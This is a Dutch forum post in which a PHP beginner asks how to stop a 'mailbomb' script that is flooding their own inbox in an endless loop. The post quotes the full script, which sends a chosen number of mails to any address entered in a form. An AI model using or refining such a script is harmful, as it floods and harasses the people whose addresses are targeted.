Ik ben sinds een weekje bezig met php. Nu heb ik voor de lol een soort van mailbom gemaakt, even in een paar minuutjes. Deze heb ik een keer uitgevoerd op mijn eigen adres. Maar nu blijft deze gewoon doorstromen, ook als ik het browservenster sluit. Nu is mijn vraag: hoe kan ik voorkomen dat mijn hele mailbox volgespammed wordt?
Het script ziet er als volgt uit:
Plz geen reacties van: eigen schuld ofzo, ik weet zelf ook wel dat het dom was!
Het script ziet er als volgt uit:
PHP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
| <?php $i = 0; $bericht = $_POST['bericht']; $email = $_POST['email']; $aantal = $_POST['aantal']; $onderwerp = $_POST['onderwerp']; $show = true; $ok = true; if($_SERVER['REQUEST_METHOD'] == 'POST') { if(!$_POST['aantal']) { $ok = false; echo 'Je hebt geen aantal ingevuld!'; } elseif(!eregi("[A-Za-z0-9_-]+([.]{1}[A-Za-z0-9_-]+)*@[A-Za-z0-9-]+([.]{1}[A-Za-z0-9-]+)+", $_POST['email'])) { $ok = false; echo 'Je hebt geen geldig e-mailadres ingevuld!'; } elseif(!$_POST['onderwerp']) { $ok = false; echo 'Je hebt geen onderwerp ingevuld!'; } elseif(!$_POST['bericht']) { $ok = false; echo 'Je hebt geen bericht ingevuld!'; } while($i < $aantal && $ok != false) { $show = false; $i = $i++; mail($email,$onderwerp,$bericht); } echo 'Je '.$aantal.'berichten zijn verzonden!'; header("Location: mailbomb.php"); } if($show == true) { ?> <FORM method = "post" action = "mailbomb.php"> <TABLE> <TR><TD>Emailadres:</TD><TD><input type="text" name="email" size= "30"></TD></TR> <TR><TD>Aantal:</TD><TD><input type="text" name="aantal" size="6"></TD></TR> <TR><TD>Onderwerp:</TD><TD><input type="text" name="onderwerp" size= "50"></TD></TR> <TR><TD>Te zenden tekst:</TD><TD><textarea name="bericht" rows="5" cols="35" ></textarea></TD></TR> <TR><TD COLSPAN="2"><input type = "submit" value = "Verzenden"></TD></TR> </TABLE> </FORM> <?php } ?> |
Plz geen reacties van: eigen schuld ofzo, ik weet zelf ook wel dat het dom was!